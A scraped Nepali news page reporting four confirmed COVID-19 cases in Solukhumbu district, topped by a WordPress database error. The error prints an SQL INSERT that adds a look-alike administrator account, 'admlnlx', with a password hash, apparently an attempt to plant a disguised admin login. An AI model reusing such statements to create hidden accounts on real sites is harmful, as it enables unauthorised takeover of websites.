WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk0ztESPPLazYUb0.hK.QlkhU/yEzS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 00:10:13', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा चार जनामा कोरोना भएको पुष्ठि – Gaule Khabar

सोलुखुम्बुमा चार जनामा कोरोना भएको पुष्ठि

सोलुखुम्बुमा चार जनामा कोरोना भएको पुष्ठि

गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लामा चारजनामा कोरोना भाइरस संक्रमण पुष्टि भएको छ । स्वाव संकलन गरी पिसिआर परीक्षणका लागि पठाइएका २६ जना मध्ये चार जनामा कोरोना संक्रमण देखिएको जिल्ला स्वास्थ्य कार्यालय सोलुखुम्बुले जनाएको छ ।

कोरोना (कोभिड-१९) संक्रमितमध्ये सोलुदुधकुण्ड नगरपालिका ११ तिङलाका २६ बर्षिय र वडा नं ८ केरुङका ३० बर्षिय पुरुष रहेका छन् भने थुलुङ दुधकोशीगाउँपालिका ५ का ३२ बर्षिय र वडा नं ७ का ३४ बर्षिय पुरुषमा कोरोना पुष्टि भएको हो ।

उनीहरु साउदीबाट गत जेठमा नेपालफर्किएका हुन् । संक्रमण पुष्टि भएका ती यूवा जिल्ला अस्पताल फाप्लु र थुलुङदूधकोशी गाउँपालिकाको क्वारिन्टीन रहेका छन ।

उनीहरुको अवस्था सामान्य रहेपनि आइसोलेशन वार्डमा सार्ने तयारी भएको स्रोतले जनाएको छ । स्वाव संकलन गरी पठाइएका अन्य २२ जनामध्ये ३ जनाको पिसिआर रिर्पोट आउनबाँकी छ । सोलुदूधकुण्ड नगरपालिकाको १६, थुलुङदुधकोशी र महाकुलुङ गाउँपालिकाको ४/४ र सोताङ गाउँपालिकाको २ जनाको स्वाव संकलन गरी पिसिआर परीक्षणका लागि पठाइएको थियो ।

यसअघि कोरोना संक्रमित सोलुदूधकुण्ड नगरपालिका ८ का एक २७ बर्षिय यूवा उपचारपछि निको भएर घर फर्किएका छन् भने अर्का एक संक्रमितको भक्तपुरमा उपचार भइरहेको छ ।

sourse:himshikharnews

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका